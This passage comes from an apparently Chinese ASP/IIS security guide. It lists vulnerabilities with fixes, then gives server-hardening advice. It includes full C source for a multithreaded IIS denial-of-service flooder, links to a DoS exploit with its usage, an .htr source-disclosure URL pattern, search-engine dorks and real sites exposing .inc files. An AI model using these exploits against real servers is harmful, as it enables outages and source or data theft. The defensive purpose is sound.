15 繞過驗(yàn)證直接進(jìn)入ASP頁面

漏洞描述:

如果用戶知道了一個(gè)ASP頁面的路徑和文件名,而這個(gè)文件又是要經(jīng)過驗(yàn)證才能進(jìn)去的,但是用戶直接輸入這個(gè)ASP頁面的文件名,就有可能通過繞過驗(yàn)證.比如:我在一些網(wǎng)站上這樣試過:首先關(guān)閉所有的瀏覽器,窗口,輸入:
http://someurl/system_search.asp?page=1
就樣就看到了只能系統(tǒng)員才能看到的頁面。當(dāng)然有些人為了防止這種情況也會(huì)在system_search.asp的開頭加個(gè)判斷,比如:判斷session("system_name"),如果不為空時(shí)就能進(jìn)入,這樣上面的url請(qǐng)求就不能直接進(jìn)入管理員頁面了。但是這種方法也有一個(gè)漏洞,如果攻擊者先用一個(gè)合法的帳號(hào),或者在本機(jī)上生成一個(gè)session,如session("system_name")="admi",那因?yàn)閟ession("system_name")不為空,這樣也能直接進(jìn)入繞過密碼,直接進(jìn)入管理員頁面。

解決方法:

在需要驗(yàn)證的ASP頁面開頭處進(jìn)行相應(yīng)的處理。比如:可跟蹤上一個(gè)頁面的文件名,只有從上一頁面轉(zhuǎn)進(jìn)來的會(huì)話才能讀取這個(gè)頁面。


16、IIS4.0/5.0特殊數(shù)據(jù)格式的URL請(qǐng)求遠(yuǎn)程DOS攻擊

漏洞描述:

當(dāng)在安裝有有IIS4.0或者IIS5.0的web服務(wù)上,請(qǐng)求一個(gè)具有特殊數(shù)據(jù)格式的URL,會(huì)拖慢受攻擊web 服務(wù)器的響應(yīng)速度,或許會(huì)使其暫時(shí)停止響應(yīng)。

受影響的版本

Microsoft Internet Information Server 4.0
Microsoft Internet Information Server 5.0

漏洞測(cè)試程序如下:

http://202.96.168.51/download/exploits/iisdos.exe
源代碼如下:
http://202.96.168.51/download/exploits/iisdos.zip
測(cè)試程序:
只要打入:iisdos <***.***.**.**> 就能攻擊對(duì)方web 服務(wù)器

問題解決:

Internet Information Server 4.0:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=20906
Internet Information Server 5.0:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=20904
更多的信息:
http://www.microsoft.com/technet/security/bulletin/ms00-030.asp
Microsoft 安全公告MS00-021:
http://www.microsoft.com/technet/security/bulletin/fq00-030.asp
相關(guān)連接
http://www.ussrback.com


17 IIS web server DOS

漏洞描述:

默認(rèn)情況下,IIS容易被拒絕服務(wù)攻擊。如果注冊(cè)表中有一個(gè)叫 "MaxClientRequestBuffer" 的鍵未被創(chuàng)建,針對(duì)這種NT系統(tǒng)的攻擊通常能奏效。 "MaxClientRequestBuffer" 這個(gè)鍵用于設(shè)置IIS允許接受的輸入量。如果 "MaxClientRequestBuffer" 設(shè)置為256(bytes),則攻擊者通過輸入大量的字符請(qǐng)求IIS將被限制在256字節(jié)以內(nèi)。而系統(tǒng)的缺省設(shè)置對(duì)此不加限制,因此,利用下面的程序??梢院苋菀椎貙?duì)IIS server實(shí)行DOS攻擊:

#include <stdio.h>
#include <windows.h>
#define MAX_THREAD 666
void cng();
char *server;
char *buffer;
int port;
int counter = 0;
int current_threads = 0;
int main(int argc, char **argv)
{
WORD tequila;
WSADATA data;
int p;
DWORD tid;
HANDLE hThread[2000];
//This code is as is and sucks as it is. Wont exit correctly and a lot
of other fun things.
//That I didnt want to take the time to do. So just ctrl+c out of the
code.
//Load up cnghack.exe 3 times for charm.
printf("CNG IIS DoS.\nMarc@eEye.com\nhttp://www.eeye.com\n\"For my
beloved.\"\n");
if(argc<2){
printf("Usage: %s [server] [port]\n",argv[0]);
exit(1);
}
buffer=malloc(17500);
memset( buffer, A, strlen(buffer));
server=argv[1];
port=atoi(argv[2]);
tequila = MAKEWORD( 1, 1 );
printf("Attempting to start winsock... ");
if( (WSAStartup(tequila, &data)) !=0 ){
printf("failed to start winsock.\n");
exit(1);
}
else{
printf("started winsock.\n\n");
}

counter = 0;
for(p = 0 ; p < MAX_THREAD ; ++p ){
hThread[counter] = CreateThread(0,
0,
(LPTHREAD_START_ROUTINE) cng,
( void * )++counter,
0,
&tid);
}
Sleep(250);
while( current_threads )
Sleep(250);
counter = 0;
printf("Terminated Threads.\n");
while (counter < MAX_THREAD)
{
TerminateThread( hThread[counter], 0 );
++counter;
}
WSACleanup();
return 0;
}

void cng()
{
int SockFD=0, p;
struct sockaddr_in DstSAin;
char GETKILLED[]="GET / HTTP/\r\n";
int die=1;
printf("Entered CNG\n");
++current_threads;
DstSAin.sin_family = AF_INET;
DstSAin.sin_port = htons((u_short)port);
DstSAin.sin_addr.s_addr=inet_addr( server );
if((SockFD = socket(AF_INET, SOCK_STREAM, 0)) < 0){
printf("Failed to create socket\n");
--current_threads;
return;
}
if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
{
p=send(SockFD,GETKILLED,strlen(GETKILLED),0);
printf("Step 1: %i\n", p);
for(;;){
p=send(SockFD,buffer,strlen(buffer),0);
printf("P: %i\n", p);
//put in some code to check if send = -1 more then X times we drop
the loop and exit the thread
//bla bla bla i love the dirtiness of concept code.
}
}
--current_threads;
printf("Exited CNG\n");
return;
}

cnghack.c works by doing the following:
Connects to example.com
Sends: GET / HTTP/[return][buffer]

Where:
[return] is just an \r\n
[buffer] is a never ending stream of As

攻擊結(jié)果將導(dǎo)致NT系統(tǒng)的CPU占用率達(dá)到 100%

解決方案

運(yùn)行Regedt32.exe
在:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\w3svc\parameters
增加一個(gè)值:
Value Name: MaxClientRequestBuffer
Data Type: REG_DWORD
設(shè)置為十進(jìn)制
具體數(shù)值設(shè)置為你想設(shè)定的IIS允許接受的URL最大長度。

18、MS ODBC數(shù)據(jù)庫連接溢出導(dǎo)致NT/9x拒絕服務(wù)攻擊

漏洞描述:

Microsoft ODBC數(shù)據(jù)庫在連接和斷開時(shí)可能存在潛在的溢出問題(Microsoft ACCESS數(shù)據(jù)庫相關(guān))。
如果不取消連接而直接和第二個(gè)數(shù)據(jù)庫相連接,可能導(dǎo)致服務(wù)停止。

影響系統(tǒng):

ODBC 版本: 3.510.3711.0
ODBC Access驅(qū)動(dòng)版本: 3.51.1029.00
OS 版本: Windows NT 4.0 Service Pack 5, IIS 4.0 (i386)
Microsoft Office 97 Professional (MSO97.dll: 8.0.0.3507)

漏洞檢測(cè)方法如下:

ODBC 連接源名稱: miscdb
ODBC 數(shù)據(jù)庫型號(hào): MS Access
ODBC 假設(shè)路徑: d:\data\misc.mdb

ASP代碼如下:

<%
set connVB = server.createobject("ADODB.Connection")
connVB.open "DRIVER={Microsoft Access Driver (*.mdb)}; DSN=miscdb"

%>

<html>
<body>
...lots of html removed...
<!-- We Connect to DB1 -->
<%
set connGlobal = server.createobject("ADODB.Connection")
connGlobal.Open "DSN=miscdb;User=sa"
mSQL = "arb SQL Statement"
set rsGlobal = connGlobal.execute(mSQL)
While not rsGlobal.eof
Response.Write rsGlobal("resultfrommiscdb")
rsGlobal.movenext
wend
rsGlobal.close
set rsGlobal = nothing
connGlobal.close
set connGlobal = nothing
Note we do NOT close the connection
%>

<!-- Call the same database by means of DBQ direct file access -->
<%
set connGlobal = server.createobject("ADODB.Connection")
connGlobal.Open "DRIVER={Microsoft Access Driver (*.mdb)};
DBQ=d:\data\misc.mdb"
mSQL = "arb SQL Statement"
set rsGlobal = connGlobal.execute(mSQL)

While not rsGlobal.eof
Response.Write rsGlobal("resultfrommiscdb")
rsGlobal.movenext
wend
rsGlobal.close
set rsGlobal = nothing
connGlobal.close
set connGlobal = nothing
Note we DO close the connection
%>

在這種情況下,IIS處理進(jìn)程將會(huì)停頓,CPU使用率由于inetinfo.exe進(jìn)程將達(dá)到100%。只有重新啟動(dòng)計(jì)算機(jī)才能恢復(fù)。


19、ASP主頁.inc文件泄露問題

漏洞描述:

受影響的版本:任何提供ASP服務(wù)的系統(tǒng)
遠(yuǎn)程:YES / 本地:YES

內(nèi)容摘要:

當(dāng)存在asp的主頁正在制作并沒有進(jìn)行最后調(diào)試完成以前,可以被某些搜索引擎機(jī)動(dòng)追加為搜索對(duì)象,如果這時(shí)候有人利用搜索引擎對(duì)這些網(wǎng)頁進(jìn)行查找,會(huì)得到有關(guān)文件的定位,并能在瀏覽器中察看到數(shù)據(jù)庫地點(diǎn)和結(jié)構(gòu)的細(xì)節(jié)揭示完整的源代碼。
具體操作過程是:

- 利用搜索引擎查找包含+"Microsoft VBScript 運(yùn)行時(shí)刻錯(cuò)誤執(zhí)行搜索" +".inc ," 的關(guān)鍵字
- 搜索引擎會(huì)自動(dòng)查找包含asp的包含文件(.inc)并顯示給用戶
- 利用瀏覽器觀看包含文件的源代碼,其中可能會(huì)有某些敏感信息

漏洞的利用:

例子:
- http://shopping.altavista.com/inc/lib/prep.lib
暴露數(shù)據(jù)庫連接和性質(zhì), 資源地點(diǎn), 小甜餅邏輯,服務(wù)器 IP 地址
- http://www.justshop.com/SFLib/ship.inc
暴露數(shù)據(jù)庫性質(zhì)
- http://www.bbclub.com:8013/includes/general.inc
暴露 cobranding
- http://www.salest.com/corporate/admin/include/jobs.inc
暴露 datafile 地點(diǎn)和結(jié)構(gòu)
- http://www.bjsbabes.com/SFLib/design.inc
包括數(shù)據(jù)庫結(jié)構(gòu)為 StoreFront 2000 暴露源代碼
- http://www.ffg.com/scripts/IsSearchEngine.inc
暴露搜索引擎記錄文件
- http://www.wcastl.com/include/functions.inc
暴露成員電子郵件地址
- http://www.wcastl.com/flat/comments.txt
暴露成員私人的注釋文件
- http://www.traveler.net/two/cookies.inc
暴露 cookie 邏輯

解決方案:

- 搜索引擎應(yīng)該不索引有 asp 運(yùn)行時(shí)刻錯(cuò)誤的頁
- 程序員應(yīng)該在網(wǎng)頁發(fā)布前對(duì)其進(jìn)行徹底的調(diào)試
- 安全專家需要固定 asp 包含文件以便外部的用戶不能看到它們
asp 新聞組、站點(diǎn)提供兩個(gè)解決方案對(duì)這個(gè)漏洞進(jìn)行修正,首先對(duì) .inc 文件內(nèi)容進(jìn)行加密,其次也可以使用 .asp 文件代替
.inc 文件使用戶無法從瀏覽器直接觀看文件的源代碼。.inc 文件的文件名不用使用系統(tǒng)默認(rèn)的或者有特殊含義容易被用戶猜測(cè)到的,盡量使用無規(guī)則的英文字母。


20、利用Activer server explorer可對(duì)文件進(jìn)行讀寫訪問

漏洞描述:

chinaasp的Activer server explorer可以很方便的對(duì)本地文件在線查看服務(wù)器上的目錄 在線查看文件的名稱、大小、類型、修改時(shí)間,在線編輯純文本文件,如.txt、.htm、.asp、.pl、.cgi等等,直接執(zhí)行服務(wù)器上的文件。
Activer server explorer要求填寫相對(duì)路徑或者絕對(duì)路徑,但是假如:有一個(gè)攻擊者把Activer server explorer上傳到目標(biāo)服務(wù)器上的某個(gè)目錄,并且這個(gè)目錄支持ASP的話,那么他就可以通過Activer server explorer修改、執(zhí)行目標(biāo)服務(wù)器上的文件。這種情況可以發(fā)生在一個(gè)攻擊者擁有目標(biāo)NT服務(wù)器上的一個(gè)可寫目錄帳號(hào),并且這個(gè)目錄又支持ASP。比如一些支持ASP的個(gè)人免費(fèi)主頁服務(wù)器,把Activer server explorer先傳上你申請(qǐng)的免費(fèi)主頁空間,再通過各種方法得到目標(biāo)服務(wù)器的路徑,(比如可通過漏洞:"請(qǐng)求不存在的擴(kuò)展名為idq或ida 文件,會(huì)暴露文件在服務(wù)器上的物理地址.").或者直接在相對(duì)路徑上填".",一般是默認(rèn)。這樣攻擊者就能任意修改,執(zhí)行目標(biāo)服務(wù)器上的文件,不管他對(duì)這個(gè)文件有無讀寫訪問權(quán)。
所以那些提供有ASP服務(wù)的個(gè)人主頁或者其它服務(wù)的服務(wù)器,就要加倍小心這種攻擊了。

漏洞解決方法

其實(shí)Activer server explorer就是利用了上面講的漏洞 4 filesystemobject 組件篡改下載 fat 分區(qū)上的任何文件的漏洞。
那么我們?nèi)绾尾拍芟拗朴脩羰褂肍ileSystemObject對(duì)象呢?一種極端的做法是完全反注冊(cè)掉提供FileSystemObject對(duì)象的那個(gè)組件,也就是Scrrun.dll。具體的方法如下:

  在MS-DOS狀態(tài)下面鍵入:

Regsvr32 /u c:\windows\system\scrrun.dll

(注意:在實(shí)際操作的時(shí)候要更改成為你本地的實(shí)際路徑)

  但是這樣的話,就不能使用FileSystemObject對(duì)象了,有時(shí)利用FileSystemObject對(duì)象來管理文件是很方便,有什么辦法能兩全其美呢?

我們可以做到禁止他人非法使用FileSystemObject對(duì)象,但是我們自己仍然可以使用這個(gè)對(duì)象.
方法如下:
查找注冊(cè)表中

   HKEY_CLASSES_ROOT\Scripting.FileSystemObject 鍵值

  將其更改成為你想要的字符串(右鍵-->"重命名"),比如更改成為

   HKEY_CLASSES_ROOT\Scripting.FileSystemObject2

  這樣,在ASP就必須這樣引用這個(gè)對(duì)象了:

   Set fso = CreateObject("Scripting.FileSystemObject2")

  而不能使用:

   Set fso = CreateObject("Scripting.FileSystemObject")

  如果你使用通常的方法來調(diào)用FileSystemObject對(duì)象就會(huì)無法使用了。

  只要你不告訴別人這個(gè)更改過的對(duì)象名稱,其他人是無法使用FileSystemObject對(duì)象的。這樣,作為站點(diǎn)管理者我們就杜絕了他人非法使用FileSystemObject對(duì)象,而我們自己仍然可以使用這個(gè)對(duì)象來方便的實(shí)現(xiàn)網(wǎng)站在線管理等等功能了!


21 IIS4.0/IIS5.0超長文件名請(qǐng)求存在漏洞

漏洞描述:

受影響的版本:

Microsoft IIS 5.0
+ Microsoft Windows NT 2000
Microsoft IIS 4.0
+ Microsoft Windows NT 4.0
+ Microsoft BackOffice 4.5
- Microsoft Windows NT 4.0
+ Microsoft BackOffice 4.0
- Microsoft Windows NT 4.0

當(dāng)在一個(gè)已知的文件名后加230個(gè)"%20"再加個(gè).htr,會(huì)使安裝有Microsoft IIS 4.0/5.0泄漏該文件的內(nèi)容。這是由ISM.dll映射的.htr文件引起的.比如:

http://target/filename%20<重復(fù)230次>.htr

這種請(qǐng)求只有當(dāng).htr請(qǐng)求是第一次調(diào)用或者ISM.dll第一次裝載進(jìn)內(nèi)存,才能起作用。

解決方法:

安裝補(bǔ)丁

Microsoft IIS 5.0:
http://download.microsoft.com/download/win2000platform/Patch/Q249599/NT5/EN-US/Q249599_W2K_SP1_X86_en.EXE

Microsoft IIS 4.0:
http://download.microsoft.com/download/iis40/Patch/Q260838/NT4ALPHA/EN-US/ismpst4i.exe


22 ASP編輯器會(huì)自動(dòng)備份asp文件,會(huì)被下載的漏洞

漏洞描述:

  在有些編輯asp程序的工具,當(dāng)創(chuàng)建或者修改一個(gè)asp文件時(shí),編輯器自動(dòng)創(chuàng)建一個(gè)備份文件,比如:UltraEdit就會(huì)備份一個(gè)..bak文件,如你創(chuàng)建或者修改了some.asp,編輯器自動(dòng)生成一個(gè)叫some.asp.bak文件,如果你沒有刪除這個(gè)bak文件,攻擊有可以直接下載some.asp.bak文件,這樣some.asp的源程序就會(huì)給下載。

六 ASP安全建議

如何設(shè)置才能使ASP更加安全呢?以下我們重點(diǎn)來談?wù)凙SP安全方面要注意的問題。我們?cè)诘谖宀糠?ASP漏洞和解決方法"中針對(duì)某些漏洞,也提出了相應(yīng)的安全建議,這部分就不再重復(fù)。
  在這部分的后面還要介紹些可掃描ASP漏洞的工具。


1 安裝NT最新的補(bǔ)丁

目前最新的補(bǔ)丁是NT Option Pack 6.0.,微軟的主頁有最新的補(bǔ)丁。一般來說微軟都會(huì)及時(shí)的公布最新的漏洞和補(bǔ)丁。目前IIS最新是5.0。windows2000自帶IIS5.0.
IIS 5.0新功能如下:
安全性上:包括摘要式驗(yàn)證、整合的Windows驗(yàn)證、SGC (Server-Gated Cryptography ) 、Microsoft Certificate
Services 2.0、集區(qū)處理程序之程序保護(hù)等。
管理上:包括IIS重新激活、站臺(tái)CPU使用時(shí)間的限制、CPU資源使用記錄、使用終端機(jī)服務(wù)遠(yuǎn)程管理IIS、自訂錯(cuò)誤訊息等。
Internet標(biāo)準(zhǔn)上:包括WebDAV(Web Distributed Authoring and Versioning)、FTP重新激活、HTTP壓縮等。

Active Server Pages:包括新的轉(zhuǎn)向方法(Server.Transfer與Server.Execute方法)、新的錯(cuò)誤處理功能
(Server.GetLastError方法)、無指令.asp的執(zhí)行速度增快、可安裝組件的效能調(diào)升、Scriptlet支持、使用cookie取得瀏覽器信息、自動(dòng)增減執(zhí)行緒(executing threads)、SRC服務(wù)器端包含功能、Script Encoder編碼保護(hù)等。
更具體的功能介紹請(qǐng)參見其它資料。


2 關(guān)閉沒有用的服務(wù)和協(xié)議

"盡量少開沒用到的服務(wù)",這永遠(yuǎn)是網(wǎng)絡(luò)安全的準(zhǔn)則。如果開啟了某個(gè)服務(wù),你就要面對(duì)不少的漏洞困擾,更重要的是你還要時(shí)時(shí)提防未來的由這個(gè)服務(wù)所引起的漏洞。
比如,你不使用ftp,那就把FTP關(guān)了,不然你就要發(fā)費(fèi)大量的精力和金錢去應(yīng)付那些什么DOS,緩沖區(qū)溢出之類的漏洞。NETBIOS也是windows的一大安全隱患,我想目前服務(wù)器很少需要Netbios。再如你的IIS安裝了index server 服務(wù),那你至少要面對(duì)三個(gè)以上的有關(guān)這個(gè)服務(wù)的漏洞,因此如果你沒用到INDEX SERVER服務(wù),也大可刪除他.
同樣的道理,我們要安裝最少的協(xié)議。千萬不要安裝點(diǎn)對(duì)點(diǎn)通道通訊協(xié)議。此外,還必須小心地配置TCP/IP協(xié)議。在TCP/IP的屬性頁中選擇"IP地址"項(xiàng)目,然后選擇"高級(jí)"。在彈出來的對(duì)話框中選擇"安全機(jī)制",這樣你可以禁止UDP,然后開啟IP端口6和TCP端口80。當(dāng)然開不開這些端口主要是看你的情況了。
IIS中的應(yīng)用程序映射也是個(gè)很大的安全漏洞,請(qǐng)?jiān)贗IS中設(shè)置好擴(kuò)展名和可執(zhí)行路徑,刪除沒用的擴(kuò)展名。


3 設(shè)置好你的NT

NT缺省安裝時(shí),系統(tǒng)賬號(hào)Administrator和Guest被自動(dòng)設(shè)置,很多攻擊者就是利用這些賬號(hào)來猜密碼,從而進(jìn)入你的系統(tǒng)。雖然沒有足夠的耐心,很難猜中這些密碼,但是為了安全起見,建議把這些賬號(hào)重新命名或者刪除。
NT SERVER的系統(tǒng)策略編輯器非常有用。按"管理工具"->"系統(tǒng)策略編輯器"就可以進(jìn)入,然后選擇"文件"->"打開注冊(cè)表",并選擇"本地計(jì)算機(jī)"圖標(biāo),就可以認(rèn)真配置了。主要設(shè)置以下幾項(xiàng):

1. 取消:網(wǎng)絡(luò)->系統(tǒng)規(guī)則更新->遠(yuǎn)程更新
2. 取消:WINDOWS NT網(wǎng)絡(luò)->共享->創(chuàng)建隱藏的驅(qū)動(dòng)器共享
3. 設(shè)置:Windows NT遠(yuǎn)程訪問下面的各項(xiàng)
4. 設(shè)置:Windows NT系統(tǒng)->登錄中各個(gè)項(xiàng)目。包括設(shè)置登錄標(biāo)記;不允許從"身份驗(yàn)證對(duì)話框"關(guān)機(jī);不顯示上次登錄的用戶名.
5. 設(shè)置:WINDOWS NT系統(tǒng)->文件系統(tǒng)中的"不為長文件名創(chuàng)建8.3文件名"

不要使用遠(yuǎn)程管理軟件,除非不得已。由于NT不太支持遠(yuǎn)程管理,所以你可能會(huì)安裝Reachout或者PC anywhere來管理??墒牵?dāng)你安裝了這些軟件,你就不得不開啟TCP/IP的所有端口。
在你離開服務(wù)器的時(shí)候,請(qǐng)按"Ctrl+del+alt",并選擇"鎖定工作站"。


4 磁盤文件格式使用比較安全的NTFS格式

NTFS 權(quán)限是 Web 服務(wù)器安全性的基礎(chǔ),它定義了一個(gè)或一組用戶訪問文件和目錄的不同級(jí)別。當(dāng)擁有 Windows NT 有效帳號(hào)的用戶試圖訪問一個(gè)有權(quán)限限制的文件時(shí),計(jì)算機(jī)將檢查文件的 訪問控制表 (ACL)。該表定義了不同用戶和用戶組 所被賦予的權(quán)限。例如,Web 服務(wù)器上的 Web 應(yīng)用程序的所有者需要有"更改"權(quán)限來查看、更改和刪除應(yīng)用程序的 .asp 文件。但是,訪問該應(yīng)用程序的公共用戶應(yīng)僅被授予"只讀"權(quán)限,以便將其限制為只能查看而不能更改應(yīng)用程序的 Web 頁。

5 對(duì)目錄設(shè)置不同的屬性,如:Read、Excute、Script

您可以通過配置您的 Web 服務(wù)器的權(quán)限來限制所有用戶查看、運(yùn)行和操作您的ASP 頁的方式。不同于 NTFS 權(quán)限提供的控制特定用戶對(duì)應(yīng)用程序文件和目錄的訪問方式, Web 服務(wù)器權(quán)限應(yīng)用于所有用戶,并且不區(qū)分用戶帳號(hào)的類型。 對(duì)于要運(yùn)行您的 ASP 應(yīng)用程序的用戶,在設(shè)置 Web 服務(wù)器權(quán)限時(shí),必須遵循下列原則:
對(duì)包含 .asp 文件的虛擬目錄允許"讀"或"腳本"權(quán)限。
對(duì) .asp 文件和其他包含腳本的文件(如 .htm 文件等)所在的虛目錄允許"讀"和"腳本"權(quán)限。
對(duì)包含 .asp 文件和其他需要"執(zhí)行"權(quán)限才能運(yùn)行的文件(如 .exe 和 .dll 文件等)的虛目錄允許"讀"和"執(zhí)行"權(quán)限。


6 維護(hù) Global.asa 的安全

為了充分保護(hù) ASP 應(yīng)用程序,一定要在應(yīng)用程序的 Global.asa 文件上為適當(dāng)?shù)挠脩艋蛴脩艚M設(shè)置 NTFS 文件權(quán)限。
如果 Global.asa 包含向?yàn)g覽器返回信息的命令而您沒有保護(hù) Global.asa 文件,則信息將被返回給瀏覽器,即便應(yīng)用程序的其他文件被保護(hù)。


7 不要把密碼,物理路徑直接寫在程序中

很難保證您的ASP程序是否會(huì)給人拿到,即使你安裝了最新的補(bǔ)丁。為
了安全起見,應(yīng)該把密碼和用戶名保存在數(shù)據(jù)庫中,使用虛擬路徑。


8 在程序中記錄用戶的詳細(xì)信息

這些信息包括用戶的瀏覽器、用戶停留的時(shí)間,用戶IP等。其中
記錄IP是最有用的。
可用下面的語句了解客戶端和服務(wù)端的信息:

<Table><%for each name in request.servervariables%>
<tr><td><%=name%>:</td>
<td><%=request.servervariables(name)%></td>
</tr>
<%next%></table>

如果我們可以記錄了用戶的IP,就能通過追捕來查用戶的具體地點(diǎn)。
當(dāng)然如果用戶通過代理來瀏覽網(wǎng)頁,上面的方法只能看到用戶代理的IP,而不能記錄用戶真實(shí)的IP。ASP沒有提供查看客戶端網(wǎng)卡物理地址(即MAC)的功能。


9 Cookie 安全性

ASP 使用 SessionID cookie 跟蹤應(yīng)用程序訪問或會(huì)話期間特定的 Web 瀏覽器的信息。這就是說,帶有相應(yīng)的 cookie 的 HTTP 請(qǐng)求被認(rèn)為是來自同一 Web 瀏覽器。Web 服務(wù)器可以使用 SessionID cookies 配置帶有用戶特定會(huì)話信息的 ASP 應(yīng)用程序。例如,如果您的應(yīng)用程序是一個(gè)允許用戶選擇和購買 CD 唱盤的聯(lián)機(jī)音樂商店,就可以用 SessionID 跟蹤用戶漫游整個(gè)應(yīng)用程序時(shí)的選擇。
SessionID 能否被黑客猜中?
為了防止計(jì)算機(jī)黑客猜中 SessionID cookie 并獲得對(duì)合法用戶的會(huì)話變量的訪問,Web 服務(wù)器為每個(gè) SessionID 指派一個(gè)隨機(jī)生成號(hào)碼。每當(dāng)用戶的 Web 瀏覽器返回一個(gè) SessionID cookie 時(shí),服務(wù)器取出 SessionID 和被賦予的數(shù)字,接著檢查是否與存儲(chǔ)在服務(wù)器上的生成號(hào)碼一致。若兩個(gè)號(hào)碼一致,將允許用戶訪問會(huì)話變量。這一技術(shù)的有效性在于被賦予的數(shù)字的長度(64 位),此長度使計(jì)算機(jī)黑客猜中 SessionID 從而竊取用戶的活動(dòng)會(huì)話的可能性幾乎為 0。
加密重要的 SessionID Cookie.
截獲了用戶 sessionID cookie 的計(jì)算機(jī)黑客可以使用此 cookie 假冒該用戶。如果 ASP 應(yīng)用程序包含私人信息,信用卡或銀行帳戶號(hào)碼,擁有竊取的 cookie 的計(jì)算機(jī)黑客就可以在應(yīng)用程序中開始一個(gè)活動(dòng)會(huì)話并獲取這些信息。您可以通過對(duì)您的 Web 服務(wù)器和用戶的瀏覽器間的通訊鏈路加密來防止 SessionID cook ie 被截獲。


10 使用身份驗(yàn)證機(jī)制保護(hù)被限制的 ASP 內(nèi)容

可以要求每個(gè)試圖訪問被限制的 ASP 內(nèi)容的用戶必須要有有效的 Windows NT帳號(hào)的用戶名和密碼。每當(dāng)用戶試圖訪問被限制的內(nèi)容時(shí),Web 服務(wù)器將進(jìn)行身份驗(yàn)證,即確認(rèn)用戶身份,以檢查用戶是否擁有有效的 Windows NT 帳號(hào)。
Web 服務(wù)器支持以下幾種身份驗(yàn)證方式:
基本身份驗(yàn)證 提示用戶輸入用戶名和密碼。
Windows NT 請(qǐng)求/響應(yīng)式身份驗(yàn)證,從用戶的 Web 瀏覽器通過加密方式獲取用戶身份信息。
然而,Web 服務(wù)器僅當(dāng)禁止匿名訪問或 Windows NT 文件系統(tǒng)的權(quán)限限制匿名訪問時(shí)才驗(yàn)證用戶


11 保護(hù)源數(shù)據(jù)庫

訪問源數(shù)據(jù)庫的 ASP 腳本需要 Web 服務(wù)器所運(yùn)行的計(jì)算機(jī)的管理員權(quán)限。在從遠(yuǎn)程計(jì)算機(jī)上運(yùn)行這些腳本時(shí),須經(jīng)已通過身份驗(yàn)證的連接,如使用 Windows NT 請(qǐng)求/響應(yīng)驗(yàn)證方式進(jìn)行連接。應(yīng)該為管理級(jí) .asp 文件創(chuàng)建一個(gè)服務(wù)器或目錄并將其目錄安全驗(yàn)證方式設(shè)置為 Windows NT 請(qǐng)求/響應(yīng)式身份驗(yàn)證。目前,僅 Microsoft Internet Explorer version 2.0 或更高版本支持 Windows NT 請(qǐng)求響應(yīng)式身份驗(yàn)證。


12 使用 SSL 維護(hù)應(yīng)用程序的安全

SSL (Secure Sockets Layer)協(xié)議是由Netscape首先發(fā)表的網(wǎng)絡(luò)資料安全傳輸協(xié)定,其首要目的是在兩個(gè)通信間提供秘密而可靠的連接。該協(xié)議由兩層組成,底層是建立在可靠的傳輸協(xié)議(例如:TCP)上的是SSL的記錄層,用來封裝高層的協(xié)議。SSL握手協(xié)議準(zhǔn)許服務(wù)器端與客戶端在開始傳輸數(shù)據(jù)前,能夠通過特定的加密算法相互鑒別。SSL的先進(jìn)之處在于它是一個(gè)獨(dú)立的應(yīng)用協(xié)議,其它更高層協(xié)議能夠建立在SSL協(xié)議上。
SSL3.0 協(xié)議作為 Web 服務(wù)器安全特性,提供了一種安全的虛擬透明方式來建立與用戶的加密通訊連接。SSL 保證了 Web 內(nèi)容的驗(yàn)證,并能可靠地確認(rèn)訪問被限制的 Web 站點(diǎn)的用戶的身份。
通過 SSL,您可以要求試圖訪問被限制的 ASP 應(yīng)用程序的用戶與您的服務(wù)器建立一個(gè)加密連接;以防用戶與應(yīng)用程序間交換的重要信息被截取。
比如好多基于WEB的ASP論壇都會(huì)提供注冊(cè)用戶互相發(fā)送信息的服務(wù),這種信息是明文傳送的,如果在網(wǎng)吧就很容易給人監(jiān)聽到。如果加了一層SSL認(rèn)證,就會(huì)防止發(fā)送信息被監(jiān)聽的可能。


13 客戶資格認(rèn)證

控制對(duì)您的 ASP 應(yīng)用程序訪問的一種十分安全的方法是要求用戶使用 客戶資格登錄??蛻糍Y格是包含用戶身份信息的數(shù)字身份證,它的作用與傳統(tǒng)的諸如護(hù)照或駕駛執(zhí)照等身份證明相同。用戶通常從委托的第三方組織獲得客戶資格,第三方組織在發(fā)放資格證之前確認(rèn)用戶的身份信息。(通常,這類組織要求姓名、地址、電話號(hào)碼及所在組織名稱;此類信息的詳細(xì)程度隨給予的身份等級(jí)而異。)
每當(dāng)用戶試圖登錄到需要資格驗(yàn)證的應(yīng)用程序時(shí),用戶的 Web 瀏覽器會(huì)自動(dòng)向服務(wù)器發(fā)送用戶資格。如果 Web 服務(wù)器的 Secure Sockets Layer (SSL) 資格映射特性配置正確,那么服務(wù)器就可以在許可用戶對(duì) ASP 應(yīng)用程序訪問之前對(duì)其身份進(jìn)行確認(rèn)。
作為 ASP 應(yīng)用程序開發(fā)人員,您可以編寫腳本來檢查資格是否存在并讀取資格字段。例如,您可以從資格證明中訪問用戶名字段和公司名字段。Active Server Pages 在 Request 對(duì)象的 ClientCertificate 集合中保存資格信息。
必須將 Web 服務(wù)器配置為接受或需要客戶資格,然后才能通過 ASP 處理客戶資格;否則,ClientCertificate 集合將為空。


14 ASP的加密

由于ASP腳本是采用明文(plain text)方式來編寫的,所以應(yīng)用開發(fā)商辛苦開發(fā)出來的ASP應(yīng)用程序,一旦發(fā)布到運(yùn)行環(huán)境中去后,就很難確保這些"源代碼"不會(huì)被流傳出去。這樣就產(chǎn)生了如何有效地保護(hù)開發(fā)出來的ASP腳本源代碼的需求。
官方加密程序:從微軟免費(fèi)下載到sce10chs.exe 直接運(yùn)行即可完成安裝過程。安裝完畢后,將生成screnc.exe文件,這是一個(gè)運(yùn)行在DOS PROMAPT的命令工具。
運(yùn)行screnc - l vbscript source.asp destination.asp生成包含密文ASP腳本的新文件destination.asp用記事本打開看凡是"<%和%>"之內(nèi)的,不管是否注解,都變成不可閱讀的密文了,但無法加密中文。
幾種ASP源代碼保護(hù)方法:

1,"腳本最小化"即ASP文件中只編寫盡可能少的源代碼,實(shí)現(xiàn)
商業(yè)邏輯的腳本部分被封裝到一個(gè)COM/DCOM組件,并在ASP腳
本中創(chuàng)建該組件,進(jìn)而調(diào)用相應(yīng)的方法(methed)即可。應(yīng)用開發(fā)者
動(dòng)手開發(fā)ASP腳本應(yīng)用之前就可按此思路來開發(fā),或者直接用ASP
腳本快速開發(fā)出原型系統(tǒng)后,針對(duì)需要保護(hù)、加密的重要腳本用
